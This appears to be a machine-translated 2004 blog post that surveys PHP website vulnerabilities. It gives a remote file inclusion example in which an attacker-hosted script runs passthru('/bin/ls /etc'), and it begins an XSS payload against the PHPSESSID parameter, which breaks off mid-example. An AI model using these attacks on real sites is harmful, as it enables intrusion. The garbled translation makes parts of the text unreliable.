Http://blog.9cbs.net/godttj/archive/2004/12/25/228992.aspx three articles: http://blog.9cbs.net/feel8/archive/2004/10/29/159024.aspxhttp: //blog.9cbs.net/feel8/archive/2004/10/29/159015.aspxhttp://blog.9cbs.net/feel8/archive/2004/10/29/159019.ASPXPHP website vulnerability related summary from now From the network security, everyone is most concerned with the largest Web page vulnerability should be ASP. In this regard, Xiaozhu is an expert, I have no say, but in PHP, there is also a serious security problem. But this article is not much. Here, discuss the related vulnerabilities of the PHP page with everyone. I have made a summary of the current PHP vulnerability, which is roughly divided into the following: including file vulnerabilities, Script commands perform a variety of vulnerabilities, file disclosure vulnerabilities, SQL injection vulnerability, etc. Of course, some of the universal technologies such as cookie spoof and other general technologies are not discussed here, and there are many online information. So, let's analyze how to use these Vulnerability! First, let's discuss the included file vulnerability. This vulnerability should be said to be a PHP. This is because the remote attacker can use these vulnerabilities to use these vulnerabilities in the system Any command is performed. Let's take an example: assume that there is such a code in A.PHP: In this code, $ include is generally An already set up path, but we can build a path to achieve the purpose of attack. For example, we are submitted: a.php? Include = http://web/b.php, this web is our attack Space, of course, B.php is also the code we use to attack. We can write in B.php Similar to: Passthru ("/ bin / ls / etc"); this can be implemented It is a purposeful attack. (Note: Web server should not perform PHP code, otherwise there is a problem. Related details can see << How to attack the common vulnerabilities in the PHP program >>). In this vulnerability, There are a lot of conditions, saying that Paypal Store Front, HotNews, Mambo Open Source, PHPDIG, YABB SE, PHPBB, INV ISIONBOARD, SOLMETRA SPAW Editor, Les Visiteurs, PHPGEDVIEW, X-CART, etc. Next, let's take a look at the script command to perform a vulnerability. This is because the URI parameters submitted by the user lack full filtering, submitted data containing malicious HTML code, It can lead to trigger cross-station script attacks, which may get sensitive information for target users. We also give an example: In the PHP Transparent PHP PHP 4.3.1, the index.php page in the following versions of PHPSESSID lacks a full filtering, we can achieve the purpose of the attack by such code: http: // Web / INDEX. PHP? PHPSESSID = ">
